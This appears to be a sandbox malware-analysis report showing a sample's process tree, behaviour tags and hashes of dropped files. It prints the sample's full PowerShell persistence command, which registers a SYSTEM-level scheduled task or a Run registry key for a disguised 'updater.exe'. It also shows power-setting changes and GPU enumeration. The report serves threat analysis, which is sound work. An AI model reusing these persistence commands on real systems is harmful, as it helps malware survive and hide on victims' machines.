C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4196
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3904
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1664
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4420
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3952 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
PID:1576 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵PID:4680
-
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1188
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3692
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
PID:4168 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 6003⤵
- Program crash
PID:3684
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 4168 -ip 41681⤵PID:3084
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:948
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
1KB
MD5a31985d40108935c8ce70896d54528a2
SHA14e3a27b73eaac2d00b533f9c1dbe9f3c28b845c1
SHA256e130df7be2343f0d907d33b797104044d0293d70e5fb05123c8f65a26e22d04b
SHA512242299b8ade43470b64b365ee39bee26397c2b7b0802f0d9123fd681d7d82a1a6dd022e57130d7b0861f4f7b6d6f2f7d8605fdee6e46dc9c35d84dbaaeab2e16
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
557KB
MD530d5f615722d12fdda4f378048221909
SHA1e94e3e3a6fae8b29f0f80128761ad1b69304a7eb
SHA256b7cb464cd0c61026ec38d89c0a041393bc9369e217303677551eec65a09d2628
SHA512a561a224d7228ec531a966c7dbd6bc88138e2f4a1c8112e5950644f69bf3a43b1e87e03bc1b4fd5e9ca071b5a9353b18697573404602ccd51f2946faf95144c2
-
Filesize
52KB
MD51b20e998d058e813dfc515867d31124f
SHA1c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f
SHA25624a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00
SHA51279849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6
-
Filesize
52KB
MD51b20e998d058e813dfc515867d31124f
SHA1c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f
SHA25624a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00
SHA51279849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6
-
Filesize
160KB
MD5b9363486500e209c05f97330226bbf8a
SHA1bfe2d0072d09b30ec66dee072dde4e7af26e4633
SHA25601138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35
SHA5126d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534
-
Filesize
160KB
MD5b9363486500e209c05f97330226bbf8a
SHA1bfe2d0072d09b30ec66dee072dde4e7af26e4633
SHA25601138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35
SHA5126d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534
-
Filesize
160KB
MD5b9363486500e209c05f97330226bbf8a
SHA1bfe2d0072d09b30ec66dee072dde4e7af26e4633
SHA25601138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35
SHA5126d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534
-
Filesize
3.5MB
MD581a0ecc23b44da5116d397c0a3104a05
SHA101efd55a04010ec4e7197bcac7ec351bb8e5bf07
SHA2563f59d2cf23b45b7f56563e85bf818f827f2607d12661fb438bcf031550ec0ec0
SHA512cf0c87b4b5101898a48ab312cd1436e2738762ee74d1d77a29635053a373d5dff237da84a17dfe7897c7e99b919325ff8c47238a2fd06dfdb04f3d18f4a97185
-
Filesize
3.5MB
MD581a0ecc23b44da5116d397c0a3104a05
SHA101efd55a04010ec4e7197bcac7ec351bb8e5bf07
SHA2563f59d2cf23b45b7f56563e85bf818f827f2607d12661fb438bcf031550ec0ec0
SHA512cf0c87b4b5101898a48ab312cd1436e2738762ee74d1d77a29635053a373d5dff237da84a17dfe7897c7e99b919325ff8c47238a2fd06dfdb04f3d18f4a97185
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5